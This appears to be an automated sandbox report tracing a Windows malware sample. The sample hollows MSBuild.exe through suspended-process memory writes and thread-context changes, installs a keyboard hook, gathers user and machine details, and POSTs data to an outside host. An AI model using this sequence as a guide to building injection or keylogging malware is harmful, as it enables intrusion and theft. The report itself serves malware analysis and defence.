Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Process Create process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, os_pid = 0xb18, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Thread Get Context process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, os_tid = 0xa64 True 1
Fn
Memory Read process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 2130567176, size = 4 True 1
Fn
Data
Memory Allocate process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 4194304, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 360448 True 1
Fn
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x400000, size = 512 True 1
Fn
Data
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x402000, size = 328704 True 1
Fn
Data
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x454000, size = 1536 True 1
Fn
Data
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x456000, size = 512 True 1
Fn
Data
Memory Write process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0x7efde008, size = 4 True 1
Fn
Data
Thread Set Context process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, os_tid = 0xa64 True 1
Fn
Thread Resume process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, os_tid = 0xa64 True 1
Fn
Thread 0xa78
1 0
»
Category Operation Information Success Count Logfile
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe True 1
Fn
Process #2: msbuild.exe
1040 89
»
Information Value
ID #2
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:34, Reason: Child Process
Unmonitor End Time: 00:01:16, Reason: Self Terminated
Monitor Duration 00:00:41
OS Process Information
»
Information Value
PID 0xb18
Parent PID 0xa60 (c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B1C
0x B28
0x B2C
0x B38
0x B3C
0x B40
0x B44
0x B7C
0x B80
0x B84
0x B88
0x B90
0x B94
0x BB8
0x BBC
0x BC0
0x BC4
0x BC8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
custommarshalers.ni.dll 0x74750000 0x74789FFF Content Changed - 32-bit 0x74770E64 False False
...
custommarshalers.ni.dll 0x74750000 0x74789FFF Content Changed - 32-bit 0x74775920 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B3E3B8 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA5380 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B9C558, 0x73B3D8EC False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA94F0, 0x73BA01D0 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA8E08, 0x73BD4B38 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA2800, 0x73BD535C, ... False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BDCDC4 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BD5000, 0x73BDE000, ... False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BE9590, 0x73BA4000 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B9E2A0 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BAB320 False False
...
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BAB000, 0x73BAAF84, ... False False
...
buffer 0x006D0000 0x006D0FFF First Execution - 32-bit 0x006D01BC, 0x006D0DD8, ... False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A4D073 False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A4E149 False False
...
system.xml.ni.dll 0x72480000 0x729B5FFF Content Changed - 32-bit 0x728E650B False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A50050 False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A51000 False False
...
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A48650, 0x73A4A320, ... False False
...
buffer 0x000F8000 0x000F8FFF First Execution - 32-bit 0x000F85F8 False False
...
buffer 0x00332000 0x00332FFF First Execution - 32-bit 0x003324E0 False False
...
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x400000, size = 512 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x402000, size = 328704 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x454000, size = 1536 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x456000, size = 512 True 1
Fn
Data
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Control Flow #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 os_tid = 0xb1c, address = 0x0 True 1
Fn
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe 692.00 KB MD5: e4117e6974363cac8b37e5e3ff5d07a6
SHA1: 74a02a421e029d24a1d2c692df28a90296d052d0
SHA256: b77b82fa96b676790b9a207d8208d90ace3a0922d5db5938c446cd22e9132607
SSDeep: 12288:3qPSBEsVqSI0TjVMB2rdet1pEpWI8c8J:8eHVqSmUr0HipF8x 		False
...
Threads
Thread 0xb1c
963 89
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config, type = file_attributes True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x74d4ca24 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 True 1
Fn
COM Create interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductId, type = REG_NONE False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Window Create class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 1997940189 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 34804490 True 1
Fn
System Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0x213162a True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 237 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_type True 2
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, size = 4096, size_out = 559 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, size = 4096, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking False 1
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 9
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = www.agenttesla.com, address_out = 46.166.182.114 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
System Get Network Adapter Info - False 1
Fn
System Get Network Adapter Info - True 1
Fn
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 287, size_out = 287 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 181, Expect: 100-continue, Connection: Keep-Alive, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 227, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, type = file_type True 2
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, size = 4096, size_out = 51 True 1
Fn
Data
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, size = 4096, size_out = 0 True 1
Fn
Environment Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\, type = file_attributes False 1
Fn
Environment Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java, type = file_attributes False 1
Fn
